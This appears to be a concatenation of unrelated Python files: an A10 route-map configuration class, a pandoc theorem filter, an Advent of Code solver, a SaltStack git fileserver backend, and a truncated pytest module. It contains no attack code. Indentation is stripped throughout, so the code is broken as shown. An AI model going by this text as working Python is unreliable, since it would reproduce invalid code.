`https://<Hostname|Ip address>//axapi/v3/route-map/{tag}+{action}+{sequence}/set`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "set"
self.a10_url="/axapi/v3/route-map/{tag}+{action}+{sequence}/set"
self.DeviceProxy = ""
self.extcommunity = {}
self.origin = {}
self.aggregator = {}
self.weight = {}
self.level = {}
self.ip = {}
self.metric = {}
self.as_path = {}
self.comm_list = {}
self.atomic_aggregate = ""
self.community = ""
self.local_preference = {}
self.tag = {}
self.ipv6 = {}
self.dampening_cfg = {}
self.originator_id = {}
self.metric_type = {}
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
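# Hypothetical usage sketch (not part of the generated module): the kwargs
# constructor simply copies keyword arguments onto the instance, so a BGP
# "set" clause for a route-map entry could be assembled like this. Attaching
# a real DeviceProxy and issuing the REST call are omitted.
#
#   route_map_set = Set(community="100:200 no-export",
#                       local_preference={"val": 200},
#                       metric={"value": "50"})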
|
#!/usr/bin/env python
"""
Pandoc filter to convert divs with class="theorem" to LaTeX
theorem environments in LaTeX output, and to numbered theorems
in HTML output.
"""
from pandocfilters import toJSONFilter, RawBlock, Div
theoremcount = 0
def latex(x):
return RawBlock('latex',x)
def html(x):
return RawBlock('html', x)
def theorems(key, value, format, meta):
if key == 'Div':
[[ident,classes,kvs], contents] = value
if "theorem" in classes:
if format == "latex":
if ident == "":
label = ""
else:
label = '\\label{' + ident + '}'
return([latex('\\begin{theorem}' + label)] + contents +
[latex('\\end{theorem}')])
elif format == "html" or format == "html5":
global theoremcount
theoremcount = theoremcount + 1
newcontents = [html('<dt>Theorem ' + str(theoremcount) + '</dt>'),
html('<dd>')] + contents + [html('</dd>\n</dl>')]
return Div([ident,classes,kvs], newcontents)
if __name__ == "__main__":
toJSONFilter(theorems)
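# Typical invocation (illustrative example): make this file executable and
# pass it to pandoc via --filter, e.g.
#   pandoc --filter ./theorem.py input.md -o output.tex
# A div such as <div id="thm-main" class="theorem"> ... </div> in the source
# (or an equivalent fenced div, depending on your pandoc version) is then
# wrapped in a LaTeX theorem environment or numbered HTML in the output.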
|
import re
from collections import defaultdict
def day19(fileName):
substitutionRegex = re.compile(r"(.+) => (.+)")
substitutions = defaultdict(list)
with open(fileName) as infile:
for inputLine in (line.strip() for line in infile):
match = substitutionRegex.match(inputLine)
if match:
substitutions[match[1]].append(match[2])
continue
if len(inputLine) > 0:
molecule = inputLine
newMolecules = set()
for substituted in substitutions:
foundPosition = 0
lastSubstitutedLength = 0
for _ in range(molecule.count(substituted)):
searchPosition = foundPosition + lastSubstitutedLength
lastSubstitutedLength = len(substituted)
foundPosition = molecule.find(substituted, searchPosition)
for sub in substitutions[substituted]:
newMolecule = f"{molecule[:foundPosition]}{sub}{molecule[foundPosition + lastSubstitutedLength:]}"
newMolecules.add(newMolecule)
return newMolecules
molecules = day19("19.txt")
print(len(molecules))
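# Expected input format (illustrative; the real "19.txt" is not shown here):
# replacement rules, a blank line, then the molecule, e.g.
#   H => HO
#   H => OH
#   O => HH
#
#   HOH
# For that small example the set of distinct single-replacement molecules
# would be {HOOH, HOHO, OHOH, HHHH}, so the script would print 4.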
|
# -*- coding: utf-8 -*-
'''
Git Fileserver Backend
With this backend, branches and tags in a remote git repository are exposed to
salt as different environments.
To enable, add ``git`` to the :conf_master:`fileserver_backend` option in the
master config file.
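For example (the remote URL below is only a placeholder), a minimal master
configuration might look like:

.. code-block:: yaml

    fileserver_backend:
      - git

    gitfs_remotes:
      - https://github.com/example/states.git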
As of the :strong:`Helium` release, the Git fileserver backend will support
both `GitPython`_ and `pygit2`_, with pygit2 being preferred if both are
present. An optional master config parameter (:conf_master:`gitfs_provider`)
can be used to specify which provider should be used.
.. note:: Minimum requirements
Using `GitPython`_ requires a minimum GitPython version of 0.3.0, as well as
git itself.
Using `pygit2`_ requires a minimum pygit2 version of 0.19.0. Additionally,
using pygit2 as a provider requires `libgit2`_ 0.19.0 or newer, as well as
git itself. pygit2 and libgit2 are developed alongside one another, so it
is recommended to keep them both at the same major release to avoid
unexpected behavior.
.. warning::
`pygit2`_ does not yet support supplying SSH credentials, so at
this time only ``http://``, ``https://``, and ``file://`` URIs are
supported as valid :conf_master:`gitfs_remotes` entries if pygit2 is being
used.
Additionally, `pygit2`_ does not yet support passing http/https credentials
via a `.netrc`_ file.
.. _GitPython: https://github.com/gitpython-developers/GitPython
.. _pygit2: https://github.com/libgit2/pygit2
.. _libgit2: https://github.com/libgit2/pygit2#quick-install-guide
.. _.netrc: https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-File.html
'''
# Import python libs
import distutils.version # pylint: disable=E0611
import glob
import hashlib
import logging
import os
import re
import shutil
import subprocess
import time
VALID_PROVIDERS = ('gitpython', 'pygit2')
PYGIT2_TRANSPORTS = ('http', 'https', 'file')
# Import salt libs
import salt.utils
import salt.fileserver
from salt.exceptions import SaltException
from salt.utils.event import tagify
# Import third party libs
HAS_GITPYTHON = False
HAS_PYGIT2 = False
try:
import git
HAS_GITPYTHON = True
except ImportError:
pass
try:
import pygit2
HAS_PYGIT2 = True
except ImportError:
pass
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'git'
def _verify_gitpython(quiet=False):
'''
Check if GitPython is available and at a compatible version (>= 0.3.0)
'''
recommend_pygit2 = (
'pygit2 is installed, you may wish to set gitfs_provider to '
'\'pygit2\' in the master config file to use pygit2 for '
'gitfs support.'
)
if not HAS_GITPYTHON:
log.error(
'Git fileserver backend is enabled in master config file, but '
'could not be loaded, is GitPython installed?'
)
if HAS_PYGIT2 and not quiet:
log.error(recommend_pygit2)
return False
gitver = distutils.version.LooseVersion(git.__version__)
minver_str = '0.3.0'
minver = distutils.version.LooseVersion(minver_str)
errors = []
if gitver < minver:
errors.append(
'Git fileserver backend is enabled in master config file, but '
'the GitPython version is earlier than {0}. Version {1} '
'detected.'.format(minver_str, git.__version__)
)
if errors:
if HAS_PYGIT2 and not quiet:
errors.append(recommend_pygit2)
for error in errors:
log.error(error)
return False
log.info('gitpython gitfs_provider enabled')
__opts__['verified_gitfs_provider'] = 'gitpython'
return True
def _verify_pygit2(quiet=False):
'''
Check if pygit2/libgit2 are available and at a compatible version. Both
must be at least 0.19.0.
'''
recommend_gitpython = (
'GitPython is installed, you may wish to set gitfs_provider to '
'\'gitpython\' in the master config file to use GitPython for '
'gitfs support.'
)
if not HAS_PYGIT2:
log.error(
'Git fileserver backend is enabled in master config file, but '
'could not be loaded, are pygit2 and libgit2 installed?'
)
if HAS_GITPYTHON and not quiet:
log.error(recommend_gitpython)
return False
pygit2ver = distutils.version.LooseVersion(pygit2.__version__)
libgit2ver = distutils.version.LooseVersion(pygit2.LIBGIT2_VERSION)
minver_str = '0.19.0'
minver = distutils.version.LooseVersion(minver_str)
errors = []
if pygit2ver < minver:
errors.append(
'Git fileserver backend is enabled in master config file, but '
'pygit2 version is earlier than {0}. Version {1} detected.'
.format(minver_str, pygit2.__version__)
)
if libgit2ver < minver:
errors.append(
'Git fileserver backend is enabled in master config file, but '
'libgit2 version is earlier than {0}. Version {1} detected.'
.format(minver_str, pygit2.LIBGIT2_VERSION)
)
if not salt.utils.which('git'):
errors.append(
'The git command line utility is required by the Git fileserver '
'backend when using the \'pygit2\' provider.'
)
if errors:
if HAS_GITPYTHON and not quiet:
errors.append(recommend_gitpython)
for error in errors:
log.error(error)
return False
log.info('pygit2 gitfs_provider enabled')
__opts__['verified_gitfs_provider'] = 'pygit2'
return True
def _get_provider():
'''
Determine which gitfs_provider to use
'''
# Don't re-perform all the verification if we already have a verified
# provider
if 'verified_gitfs_provider' in __opts__:
return __opts__['verified_gitfs_provider']
provider = __opts__.get('gitfs_provider', '').lower()
if not provider:
# Prefer pygit2 if it's available and verified
if _verify_pygit2(quiet=True):
return 'pygit2'
elif _verify_gitpython(quiet=True):
return 'gitpython'
else:
log.error(
'No suitable versions of pygit2/libgit2 or GitPython is '
'installed.'
)
else:
if provider not in VALID_PROVIDERS:
raise SaltException(
'Invalid gitfs_provider {0!r}. Valid choices are: {1}'
.format(provider, VALID_PROVIDERS)
)
elif provider == 'pygit2' and _verify_pygit2():
return 'pygit2'
elif provider == 'gitpython' and _verify_gitpython():
return 'gitpython'
return ''
def __virtual__():
'''
Only load if the desired provider module is present and gitfs is enabled
properly in the master config file.
'''
if not isinstance(__opts__['gitfs_remotes'], list):
return False
if not isinstance(__opts__['gitfs_root'], str):
return False
if __virtualname__ not in __opts__['fileserver_backend']:
return False
provider = _get_provider()
return __virtualname__ if provider else False
def _get_ref_gitpython(repo, short):
'''
Return the ref if found, otherwise return False
'''
for ref in repo.refs:
if isinstance(ref, (git.RemoteReference, git.TagReference)):
parted = ref.name.partition('/')
refname = parted[2] if parted[2] else parted[0]
if short == refname:
return ref
return False
def _get_ref_pygit2(repo, short):
'''
Return the ref if found, otherwise return False
'''
for ref in repo.listall_references():
_, rtype, rspec = ref.split('/', 2)
if rtype in ('remotes', 'tags'):
parted = rspec.partition('/')
refname = parted[2] if parted[2] else parted[0]
if short == refname:
return repo.lookup_reference(ref)
return False
def _wait_lock(lk_fn, dest):
'''
If the write lock is there, check to see if the file is actually being
written. If there is no change in the file size after a short sleep,
remove the lock and move forward.
'''
if not os.path.isfile(lk_fn):
return False
if not os.path.isfile(dest):
# The dest is not here, sleep for a bit, if the dest is not here yet
# kill the lockfile and start the write
time.sleep(1)
if not os.path.isfile(dest):
try:
os.remove(lk_fn)
except (OSError, IOError):
pass
return False
# There is a lock file, the dest is there, stat the dest, sleep and check
# that the dest is being written, if it is not being written kill the lock
# file and continue. Also check if the lock file is gone.
s_count = 0
s_size = os.stat(dest).st_size
while True:
time.sleep(1)
if not os.path.isfile(lk_fn):
return False
size = os.stat(dest).st_size
if size == s_size:
s_count += 1
if s_count >= 3:
# The file is not being written to, kill the lock and proceed
try:
os.remove(lk_fn)
except (OSError, IOError):
pass
return False
else:
s_size = size
return False
def _stale_refs_pygit2(repo):
'''
Return a list of stale refs by running git remote prune --dry-run <remote>,
since libgit2 can't do this.
'''
remote = repo.remotes[0].name
key = ' * [would prune] '
ret = []
for line in subprocess.Popen(
'git remote prune --dry-run {0!r}'.format(remote),
shell=True,
close_fds=True,
cwd=repo.workdir,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT).communicate()[0].splitlines():
if line.startswith(key):
line = line.replace(key, '')
ret.append(line)
return ret
def init():
'''
Return the git repo object for this session
'''
bp_ = os.path.join(__opts__['cachedir'], 'gitfs')
provider = _get_provider()
repos = []
for _, opt in enumerate(__opts__['gitfs_remotes']):
if provider == 'pygit2':
transport, _, uri = opt.partition('://')
if not uri:
log.error('Invalid gitfs remote {0!r}'.format(opt))
continue
elif transport.lower() not in PYGIT2_TRANSPORTS:
log.error(
'Invalid transport {0!r} in gitfs remote {1!r}. Valid '
'transports for pygit2 provider: {2}'
.format(transport, opt, ', '.join(PYGIT2_TRANSPORTS))
)
continue
repo_hash = hashlib.md5(opt).hexdigest()
rp_ = os.path.join(bp_, repo_hash)
if not os.path.isdir(rp_):
os.makedirs(rp_)
try:
if provider == 'gitpython':
if not os.listdir(rp_):
repo = git.Repo.init(rp_)
else:
try:
repo = git.Repo(rp_)
except git.exc.InvalidGitRepositoryError:
log.error(
'Cache path {0} (corresponding remote: {1}) '
'exists but is not a valid git repository. You '
'will need to manually delete this directory on '
'the master to continue to use this gitfs remote.'
.format(rp_, opt)
)
continue
elif provider == 'pygit2':
if not os.listdir(rp_):
repo = pygit2.init_repository(rp_)
else:
try:
repo = pygit2.Repository(rp_)
except KeyError:
log.error(
'Cache path {0} (corresponding remote: {1}) '
'exists but is not a valid git repository. You '
'will need to manually delete this directory on '
'the master to continue to use this gitfs remote.'
.format(rp_, opt)
)
continue
else:
raise SaltException(
'Invalid gitfs_provider {0!r}. Valid choices are: {1}'
.format(provider, VALID_PROVIDERS)
)
except Exception as exc:
msg = ('Exception caught while initializing the repo for gitfs: '
'{0}.'.format(exc))
if provider == 'gitpython':
msg += ' Perhaps git is not available.'
log.error(msg)
return repos
if not repo.remotes:
try:
repo.create_remote('origin', opt)
# ignore git ssl verification if requested
ssl_verify = 'true' if __opts__.get('gitfs_ssl_verify', True) \
else 'false'
if provider == 'gitpython':
repo.git.config('http.sslVerify', ssl_verify)
elif provider == 'pygit2':
repo.config.set_multivar('http.sslVerify', '', ssl_verify)
except os.error:
# This exception occurs when two processes are trying to write
# to the git config at once, go ahead and pass over it since
# this is the only write
# This should place a lock down
pass
if repo.remotes:
repos.append(repo)
return repos
def purge_cache():
bp_ = os.path.join(__opts__['cachedir'], 'gitfs')
try:
remove_dirs = os.listdir(bp_)
except OSError:
remove_dirs = []
for _, opt in enumerate(__opts__['gitfs_remotes']):
repo_hash = hashlib.md5(opt).hexdigest()
try:
remove_dirs.remove(repo_hash)
except ValueError:
pass
remove_dirs = [os.path.join(bp_, r) for r in remove_dirs
if r not in ('hash', 'refs', 'envs.p')]
if remove_dirs:
for r in remove_dirs:
shutil.rmtree(r)
return True
return False
def update():
'''
Execute a git pull on all of the repos
'''
# data for the fileserver event
data = {'changed': False,
'backend': 'gitfs'}
provider = _get_provider()
pid = os.getpid()
data['changed'] = purge_cache()
repos = init()
for repo in repos:
origin = repo.remotes[0]
if provider == 'gitpython':
working_dir = repo.working_dir
elif provider == 'pygit2':
working_dir = repo.workdir
lk_fn = os.path.join(working_dir, 'update.lk')
with salt.utils.fopen(lk_fn, 'w+') as fp_:
fp_.write(str(pid))
try:
if provider == 'gitpython':
for fetch in origin.fetch():
if fetch.old_commit is not None:
data['changed'] = True
elif provider == 'pygit2':
fetch = origin.fetch()
if fetch.get('received_objects', 0):
data['changed'] = True
except Exception as exc:
log.warning(
'Exception caught while fetching: {0}'.format(exc)
)
try:
os.remove(lk_fn)
except (IOError, OSError):
pass
env_cache = os.path.join(__opts__['cachedir'], 'gitfs/envs.p')
if data.get('changed', False) is True or not os.path.isfile(env_cache):
new_envs = envs(ignore_cache=True)
serial = salt.payload.Serial(__opts__)
with salt.utils.fopen(env_cache, 'w+') as fp_:
fp_.write(serial.dumps(new_envs))
log.trace('Wrote env cache data to {0}'.format(env_cache))
# if there is a change, fire an event
if __opts__.get('fileserver_events', False):
event = salt.utils.event.MasterEvent(__opts__['sock_dir'])
event.fire_event(data, tagify(['gitfs', 'update'], prefix='fileserver'))
try:
salt.fileserver.reap_fileserver_cache_dir(
os.path.join(__opts__['cachedir'], 'gitfs/hash'),
find_file
)
except (IOError, OSError):
# Hash file won't exist if no files have yet been served up
pass
def envs(ignore_cache=False):
'''
Return a list of refs that can be used as environments
'''
if not ignore_cache:
env_cache = os.path.join(__opts__['cachedir'], 'gitfs/envs.p')
cache_match = salt.fileserver.check_env_cache(__opts__, env_cache)
if cache_match is not None:
return cache_match
base_branch = __opts__['gitfs_base']
provider = _get_provider()
ret = set()
repos = init()
for repo in repos:
if provider == 'gitpython':
ret.update(_envs_gitpython(repo, base_branch))
elif provider == 'pygit2':
ret.update(_envs_pygit2(repo, base_branch))
else:
raise SaltException(
'Invalid gitfs_provider {0!r}. Valid choices are: {1}'
.format(provider, VALID_PROVIDERS)
)
return sorted(ret)
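# Illustrative example (hypothetical remote): with ``gitfs_base: master`` and
# a remote exposing branches ``master`` and ``dev`` plus a tag ``v1.0``, the
# function above would return ['base', 'dev', 'v1.0']; the base branch is
# always reported under the special 'base' environment name.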
def _envs_gitpython(repo, base_branch):
'''
Check the refs and return a list of the ones which can be used as salt
environments.
'''
ret = set()
remote = repo.remotes[0]
for ref in repo.refs:
parted = ref.name.partition('/')
short = parted[2] if parted[2] else parted[0]
if isinstance(ref, git.Head):
if short == base_branch:
short = 'base'
if ref not in remote.stale_refs:
ret.add(short)
elif isinstance(ref, git.Tag):
ret.add(short)
return ret
def _envs_pygit2(repo, base_branch):
'''
Check the refs and return a list of the ones which can be used as salt
environments.
'''
ret = set()
remote = repo.remotes[0]
stale_refs = _stale_refs_pygit2(repo)
for ref in repo.listall_references():
ref = re.sub('^refs/', '', ref)
rtype, rspec = ref.split('/', 1)
if rtype == 'tags':
ret.add(rspec)
elif rtype == 'remotes':
if rspec not in stale_refs:
parted = rspec.partition('/')
short = parted[2] if parted[2] else parted[0]
if short == base_branch:
short = 'base'
ret.add(short)
return ret
def find_file(path, short='base', **kwargs):
'''
Find the first file to match the path and ref, read the file out of git
and send the path to the newly cached file
'''
fnd = {'path': '',
'rel': ''}
base_branch = __opts__['gitfs_base']
provider = _get_provider()
if os.path.isabs(path):
return fnd
local_path = path
if __opts__['gitfs_root']:
path = os.path.join(__opts__['gitfs_root'], local_path)
if short == 'base':
short = base_branch
dest = os.path.join(__opts__['cachedir'], 'gitfs/refs', short, path)
hashes_glob = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.hash.*'.format(path))
blobshadest = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.hash.blob_sha1'.format(path))
lk_fn = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.lk'.format(path))
destdir = os.path.dirname(dest)
hashdir = os.path.dirname(blobshadest)
if not os.path.isdir(destdir):
os.makedirs(destdir)
if not os.path.isdir(hashdir):
os.makedirs(hashdir)
repos = init()
if 'index' in kwargs:
try:
repos = [repos[int(kwargs['index'])]]
except IndexError:
# Invalid index param
return fnd
except ValueError:
# Invalid index option
return fnd
for repo in repos:
if provider == 'gitpython':
ref = _get_ref_gitpython(repo, short)
if not ref:
# Branch or tag not found in repo, try the next
continue
tree = ref.commit.tree
try:
blob = tree / path
except KeyError:
continue
blob_hexsha = blob.hexsha
elif provider == 'pygit2':
ref = _get_ref_pygit2(repo, short)
if not ref:
# Branch or tag not found in repo, try the next
continue
tree = ref.get_object().tree
try:
blob = repo[tree[path].oid]
except KeyError:
continue
blob_hexsha = blob.hex
_wait_lock(lk_fn, dest)
if os.path.isfile(blobshadest) and os.path.isfile(dest):
with salt.utils.fopen(blobshadest, 'r') as fp_:
sha = fp_.read()
if sha == blob_hexsha:
fnd['rel'] = local_path
fnd['path'] = dest
return fnd
with salt.utils.fopen(lk_fn, 'w+') as fp_:
fp_.write('')
for filename in glob.glob(hashes_glob):
try:
os.remove(filename)
except Exception:
pass
with salt.utils.fopen(dest, 'w+') as fp_:
if provider == 'gitpython':
blob.stream_data(fp_)
elif provider == 'pygit2':
fp_.write(blob.data)
with salt.utils.fopen(blobshadest, 'w+') as fp_:
fp_.write(blob_hexsha)
try:
os.remove(lk_fn)
except (OSError, IOError):
pass
fnd['rel'] = local_path
fnd['path'] = dest
return fnd
return fnd
def serve_file(load, fnd):
'''
Return a chunk from a file based on the data received
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
ret = {'data': '',
'dest': ''}
if 'path' not in load or 'loc' not in load or 'saltenv' not in load:
return ret
if not fnd['path']:
return ret
ret['dest'] = fnd['rel']
gzip = load.get('gzip', None)
with salt.utils.fopen(fnd['path'], 'rb') as fp_:
fp_.seek(load['loc'])
data = fp_.read(__opts__['file_buffer_size'])
if gzip and data:
data = salt.utils.gzip_util.compress(data, gzip)
ret['gzip'] = gzip
ret['data'] = data
return ret
def file_hash(load, fnd):
'''
Return a file hash, the hash type is set in the master config file
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
if 'path' not in load or 'saltenv' not in load:
return ''
ret = {'hash_type': __opts__['hash_type']}
short = load['saltenv']
base_branch = __opts__['gitfs_base']
if short == 'base':
short = base_branch
relpath = fnd['rel']
path = fnd['path']
if __opts__['gitfs_root']:
relpath = os.path.join(__opts__['gitfs_root'], relpath)
path = os.path.join(__opts__['gitfs_root'], path)
hashdest = os.path.join(__opts__['cachedir'],
'gitfs/hash',
short,
'{0}.hash.{1}'.format(relpath,
__opts__['hash_type']))
if not os.path.isfile(hashdest):
with salt.utils.fopen(path, 'rb') as fp_:
ret['hsum'] = getattr(hashlib, __opts__['hash_type'])(
fp_.read()).hexdigest()
with salt.utils.fopen(hashdest, 'w+') as fp_:
fp_.write(ret['hsum'])
return ret
else:
with salt.utils.fopen(hashdest, 'rb') as fp_:
ret['hsum'] = fp_.read()
return ret
def _file_lists(load, form):
'''
Return a dict containing the file lists for files, dirs, emptydirs and symlinks
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
list_cachedir = os.path.join(__opts__['cachedir'], 'file_lists/gitfs')
if not os.path.isdir(list_cachedir):
try:
os.makedirs(list_cachedir)
except os.error:
log.critical('Unable to make cachedir {0}'.format(list_cachedir))
return []
list_cache = os.path.join(list_cachedir, '{0}.p'.format(load['saltenv']))
w_lock = os.path.join(list_cachedir, '.{0}.w'.format(load['saltenv']))
cache_match, refresh_cache, save_cache = \
salt.fileserver.check_file_list_cache(
__opts__, form, list_cache, w_lock
)
if cache_match is not None:
return cache_match
if refresh_cache:
ret = {'links': []}
ret['files'] = _get_file_list(load)
ret['dirs'] = _get_dir_list(load)
ret['empty_dirs'] = _get_file_list_emptydirs(load)
if save_cache:
salt.fileserver.write_file_list_cache(
__opts__, ret, list_cache, w_lock
)
return ret.get(form, [])
# Shouldn't get here, but if we do, this prevents a TypeError
return []
def file_list(load):
'''
Return a list of all files on the file server in a specified
environment
'''
return _file_lists(load, 'files')
def _get_file_list(load):
'''
Return a list of all files on the file server in a specified
environment
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
base_branch = __opts__['gitfs_base']
gitfs_root = __opts__['gitfs_root']
provider = _get_provider()
if 'saltenv' not in load:
return []
if load['saltenv'] == 'base':
load['saltenv'] = base_branch
repos = init()
ret = set()
for repo in repos:
if provider == 'gitpython':
ret.update(
_file_list_gitpython(repo, load['saltenv'], gitfs_root)
)
elif provider == 'pygit2':
ret.update(
_file_list_pygit2(repo, load['saltenv'], gitfs_root)
)
return sorted(ret)
def _file_list_gitpython(repo, ref_tgt, gitfs_root):
'''
Get file list using GitPython
'''
ret = set()
ref = _get_ref_gitpython(repo, ref_tgt)
if not ref:
return ret
tree = ref.commit.tree
if gitfs_root:
try:
tree = tree / gitfs_root
except KeyError:
return ret
for blob in tree.traverse():
if not isinstance(blob, git.Blob):
continue
if gitfs_root:
ret.add(os.path.relpath(blob.path, gitfs_root))
continue
ret.add(blob.path)
return ret
def _file_list_pygit2(repo, ref_tgt, gitfs_root):
'''
Get file list using pygit2
'''
def _traverse(tree, repo, blobs, prefix):
'''
Traverse through a pygit2 Tree object recursively, accumulating all the
blob paths within it in the "blobs" list
'''
for entry in iter(tree):
blob = repo[entry.oid]
if isinstance(blob, pygit2.Blob):
blobs.append(os.path.join(prefix, entry.name))
elif isinstance(blob, pygit2.Tree):
_traverse(blob, repo, blobs, os.path.join(prefix, entry.name))
ret = set()
ref = _get_ref_pygit2(repo, ref_tgt)
if not ref:
return ret
tree = ref.get_object().tree
if gitfs_root:
try:
tree = repo[tree[gitfs_root].oid]
except KeyError:
return ret
if not isinstance(tree, pygit2.Tree):
return ret
blobs = []
if len(tree):
_traverse(tree, repo, blobs, gitfs_root)
for blob in blobs:
if gitfs_root:
ret.add(os.path.relpath(blob, gitfs_root))
continue
ret.add(blob)
return ret
def file_list_emptydirs(load):
'''
Return a list of all empty directories on the master
'''
return _file_lists(load, 'empty_dirs')
def _get_file_list_emptydirs(load):
'''
Return a list of all empty directories on the master
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
base_branch = __opts__['gitfs_base']
gitfs_root = __opts__['gitfs_root']
provider = _get_provider()
if 'saltenv' not in load:
return []
if load['saltenv'] == 'base':
load['saltenv'] = base_branch
repos = init()
ret = set()
for repo in repos:
if provider == 'gitpython':
ret.update(
_file_list_emptydirs_gitpython(
repo, load['saltenv'], gitfs_root
)
)
elif provider == 'pygit2':
ret.update(
_file_list_emptydirs_pygit2(
repo, load['saltenv'], gitfs_root
)
)
return sorted(ret)
def _file_list_emptydirs_gitpython(repo, ref_tgt, gitfs_root):
'''
Get empty directories using GitPython
'''
ret = set()
ref = _get_ref_gitpython(repo, ref_tgt)
if not ref:
return ret
tree = ref.commit.tree
if gitfs_root:
try:
tree = tree / gitfs_root
except KeyError:
return ret
for blob in tree.traverse():
if not isinstance(blob, git.Tree):
continue
if not blob.blobs:
if gitfs_root:
ret.add(os.path.relpath(blob.path, gitfs_root))
continue
ret.add(blob.path)
return ret
def _file_list_emptydirs_pygit2(repo, ref_tgt, gitfs_root):
'''
Get empty directories using pygit2
'''
def _traverse(tree, repo, blobs, prefix):
'''
Traverse through a pygit2 Tree object recursively, accumulating all the
empty directories within it in the "blobs" list
'''
for entry in iter(tree):
blob = repo[entry.oid]
if not isinstance(blob, pygit2.Tree):
continue
if not len(blob):
blobs.append(os.path.join(prefix, entry.name))
else:
_traverse(blob, repo, blobs, os.path.join(prefix, entry.name))
ret = set()
ref = _get_ref_pygit2(repo, ref_tgt)
if not ref:
return ret
tree = ref.get_object().tree
if gitfs_root:
try:
tree = repo[tree[gitfs_root].oid]
except KeyError:
return ret
if not isinstance(tree, pygit2.Tree):
return ret
blobs = []
if len(tree):
_traverse(tree, repo, blobs, gitfs_root)
for blob in blobs:
if gitfs_root:
ret.add(os.path.relpath(blob, gitfs_root))
continue
ret.add(blob)
return sorted(ret)
def dir_list(load):
'''
Return a list of all directories on the master
'''
return _file_lists(load, 'dirs')
def _get_dir_list(load):
'''
Get a list of all directories on the master
'''
if 'env' in load:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
load['saltenv'] = load.pop('env')
base_branch = __opts__['gitfs_base']
gitfs_root = __opts__['gitfs_root']
provider = _get_provider()
if 'saltenv' not in load:
return []
if load['saltenv'] == 'base':
load['saltenv'] = base_branch
repos = init()
ret = set()
for repo in repos:
if provider == 'gitpython':
ret.update(_dir_list_gitpython(repo, load['saltenv'], gitfs_root))
elif provider == 'pygit2':
ret.update(_dir_list_pygit2(repo, load['saltenv'], gitfs_root))
return sorted(ret)
def _dir_list_gitpython(repo, ref_tgt, gitfs_root):
'''
Get list of directories using GitPython
'''
ret = set()
ref = _get_ref_gitpython(repo, ref_tgt)
if not ref:
return ret
tree = ref.commit.tree
if gitfs_root:
try:
tree = tree / gitfs_root
except KeyError:
return ret
for blob in tree.traverse():
if not isinstance(blob, git.Tree):
continue
if gitfs_root:
ret.add(os.path.relpath(blob.path, gitfs_root))
continue
ret.add(blob.path)
return ret
def _dir_list_pygit2(repo, ref_tgt, gitfs_root):
'''
Get a list of directories using pygit2
'''
def _traverse(tree, repo, blobs, prefix):
'''
Traverse through a pygit2 Tree object recursively, accumulating all the
directory paths within it in the "blobs" list
'''
for entry in iter(tree):
blob = repo[entry.oid]
if not isinstance(blob, pygit2.Tree):
continue
blobs.append(os.path.join(prefix, entry.name))
if len(blob):
_traverse(blob, repo, blobs, os.path.join(prefix, entry.name))
ret = set()
ref = _get_ref_pygit2(repo, ref_tgt)
if not ref:
return ret
tree = ref.get_object().tree
if gitfs_root:
try:
tree = repo[tree[gitfs_root].oid]
except KeyError:
return ret
if not isinstance(tree, pygit2.Tree):
return ret
blobs = []
if len(tree):
_traverse(tree, repo, blobs, gitfs_root)
for blob in blobs:
if gitfs_root:
ret.add(os.path.relpath(blob, gitfs_root))
continue
ret.add(blob)
return ret
|
import numpy as np
import pytest
from numpy import testing as npt
from ifg.calculator import IfgCalculator
from ifg.units_converter import convert_theta_to_temperature
COMPLICATED_MESH = (
[3.0, 5.0],
[5.0, 10.0, 15.0],
np.array(
[
[4.909741, 8.182902],
[3.092943, 5.154905],
[2.36035732, 3.9339289],
]
),
)
@pytest.fixture(
params=[
([1.0], 2.0, np.array([[3.014607]])),
([3.0], 5.0, np.array([[4.909741]])),
([3.0, 5.0], 5.0, np.array([[4.909741, 8.182902]])),
COMPLICATED_MESH,
],
)
def mesh_example(request):
return request.param
class TestConverterFromThetaToTemperature:
def test_correct_conversion(self, mesh_example):
theta, volume, temperature = mesh_example
# GIVEN: theta and specific volume (atomic)
# WHEN: conversion to temperature occurs
# THEN: the result equals the expected one
npt.assert_allclose(convert_theta_to_temperature(theta, volume), temperature)
@pytest.mark.skip("broken after input methods refactoring")
def test_correct_mesh_creation():
from ifg.calculator import _make_mesh
# GIVEN: theta array, volume array and corresponding temperatures
theta, volume, temperature = COMPLICATED_MESH
# WHEN: mesh is created upon these volumes and temperatures
vv, tt = _make_mesh(volume, temperature)
# THEN: volume grid is created as if w/o theta
npt.assert_allclose(
vv,
[
[5.0, 10.0, 15.0],
[5.0, 10.0, 15.0],
],
)
# THEN: temperature grid is created with respect to both volumes and thetas
npt.assert_allclose(
tt,
np.array(
[
[4.909741, 3.092943, 2.36035732],
[8.182902, 5.154905, 3.9339289],
]
),
)
@pytest.mark.skip("broken after input methods refactoring")
def test_correct_simple_mesh_creation():
from ifg.calculator import _make_mesh
# GIVEN: simple (non-theta) volumes and temperatures
volumes = [1.0, 2.0]
temperatures = [10.0, 20.0, 30.0]
# WHEN: mesh grid is created
vv, tt = _make_mesh(volumes, temperatures)
# THEN: correct simple mesh is created
